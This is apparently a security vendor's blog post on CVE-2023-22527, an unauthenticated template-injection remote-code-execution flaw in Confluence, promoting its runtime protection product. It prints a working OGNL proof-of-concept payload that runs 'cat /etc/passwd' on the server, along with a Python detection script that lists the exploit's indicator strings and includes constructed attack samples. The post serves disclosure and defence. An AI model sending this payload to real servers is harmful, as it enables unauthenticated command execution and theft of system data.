If your organization is running an older version of Atlassian Confluence Server that’s affected by CVE-2023-22527 — the critical remote-code execution (RCE) zero day discovered recently — you either
- Already patched it,
- Didn’t have to worry about it because you were running Contrast Protect with Runtime Application Self Protection (RASP), or
- Are under attack.
Atlassian disclosed the issue on Jan. 16. The vulnerability, a template injection flaw in out-of-date versions of Confluence Data Center and Server, allows an unauthenticated attacker to achieve RCE on an affected version. Atlassian urged customers running an affected version to take immediate action.
The Common Vulnerabilities and Exposures (CVE) entry carries the top CVSS rating of 10 out of 10. It affects Confluence Data Center and Server 8 versions released before Dec. 5, 2023, and Confluence versions 8.0.0 to 8.5.3.
600+ IP addresses launched thousands of attacks
Proof-of-concept (PoC) code appeared on Jan. 21, and thousands of attempts to exploit CVE-2023-22527 soon followed. On Jan. 22, the threat-monitoring service Shadowserver reported that its servers were picking up attacks originating from 600+ unique IP addresses.
PoC
This is an example of the attack. It utilizes the endpoint:
/template/aui/text-inline.vm
And injects the following Object-Graph Navigation Language (OGNL) attack:
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"cat /etc/passwd"}))
This instantiates the class freemarker.template.utility.Execute and calls its exec() method, which in turn invokes java.lang.Runtime.exec() to run the command on the underlying operating system. In this case, the command is:
cat /etc/passwd
The command output is written to an HTTP response header named X-Cmd-Response, which returns it to the attacker.
How Contrast Runtime Security Blocks Attacks
Contrast Runtime Security (Contrast Protect) RASP already protects against this and similar vulnerabilities. Our Expression Language rule in Protect …
- tracks the request from the attacker, through the application;
- senses that classes are being instantiated based on user input; and, when required,
- blocks the attack before any harmful action can be taken.
With Protect enabled, the attack is blocked: the request still returns a 200 OK, but no extra header is set and no command output is returned to the attacker.
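The same indicators the PoC above relies on can also be matched at the edge or in access logs. The following is an added example, not Contrast's rule logic or code from this post: it decodes the stacked percent- and Java \uXXXX escapes the payload uses before matching, so that naive string filters cannot be dodged by re-encoding. The request format and the sample traffic are constructed for illustration.

```python
# Detect CVE-2023-22527 exploitation attempts in HTTP requests. Added example,
# not Contrast's rule logic; request format and samples are constructed here,
# and the indicator strings come from the PoC shown on this page.
import re
from urllib.parse import parse_qs, unquote
# Vulnerable Velocity template reached by the PoC, and OGNL fragments it uses
# to reach FreeMarker's Execute utility through the Struts2 context.
VULNERABLE_PATH = "/template/aui/text-inline.vm"
OGNL_INDICATORS = (
    "KEY_velocity.struts2.context",
    ".findValue(",
    "ServletActionContext@getResponse",
    "freemarker.template.utility.Execute",
)
_JAVA_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

def normalize(value: str) -> str:
    """Peel the encodings the PoC stacks to dodge naive matching: repeated
    percent-encoding and Java/OGNL \\uXXXX escapes (\\u0027 is a quote)."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return _JAVA_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)

def inspect_request(target: str, body: str = "") -> list[str]:
    """Indicators found in a request to the vulnerable template, checking
    query string and form body; [] means nothing matched."""
    path, _, query = target.partition("?")  # keep '#request' out of a fragment
    if not path.endswith(VULNERABLE_PATH):
        return []
    params = list(parse_qs(query, keep_blank_values=True).values())
    params += parse_qs(body, keep_blank_values=True).values()
    blob = normalize(" ".join(v for vals in params for v in vals))
    return [ind for ind in OGNL_INDICATORS if ind in blob]

# Constructed sample traffic (target, body): benign use, the PoC's OGNL chain
# without the OS command, and the class name hidden by double percent-encoding.
SAMPLES = [
    ("/template/aui/text-inline.vm?label=Home", ""),
    ("/template/aui/text-inline.vm",
     r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d"
     r".internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027"
     "&x=@org.apache.struts2.ServletActionContext@getResponse()"),
    ("/template/aui/text-inline.vm",
     "label=%255cu0027&x=%2528new+freemarker.template.utility.%2545xecute%2528%2529%2529"),
]

def scan(samples=SAMPLES) -> list[list[str]]:
    """Indicators found per sample, in SAMPLES order."""
    return [inspect_request(target, body) for target, body in samples]
```

The third sample only matches because normalize() keeps decoding until the string stops changing; a single unquote() would leave the class name as `%45xecute` and miss it.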
Protect Confluence with Contrast Runtime Security
This is not the first critical vulnerability in Confluence. Similar vulnerabilities, including CVE-2022-26134 and CVE-2021-26084, have been found and quickly exploited. Unfortunately, it is likely more will be found in the future.
In fact, CVE-2023-22527 rounds out our “Zero Days Blocked Before Discovery Hall of Fame” to a dozen:
Zero Days Blocked Before Discovery Hall of Fame (graphic)
Contrast detects and prevents exploitation against entire classes of vulnerabilities via embedded detection rules. The graphic lists examples of zero days that Contrast mitigated before they were discovered (before CVEs were issued). Contrast studies new exploits and CVEs to enhance and harden the Protect rules for real-time protection (e.g., improved JNDI rules and added ClassLoader Manipulation detection).
The Contrast Runtime Security Platform was created in response to the fact that applications are perpetually accosted by hackers intent on doing harm to your business. We recognize that it is virtually impossible to create applications that are completely free of vulnerabilities. The Runtime Security agent continuously detects and prevents both known threats and zero-day attacks by leveraging multi-technique precision sensors and dynamic control over the runtime. It offers an instrumentation-based approach that simplifies security deployment and scalability.
Using Runtime Security on Confluence or other potentially insecure applications can help to improve your security posture.
Get in touch today for a demo of Contrast Protect: your RASP solution against zero days.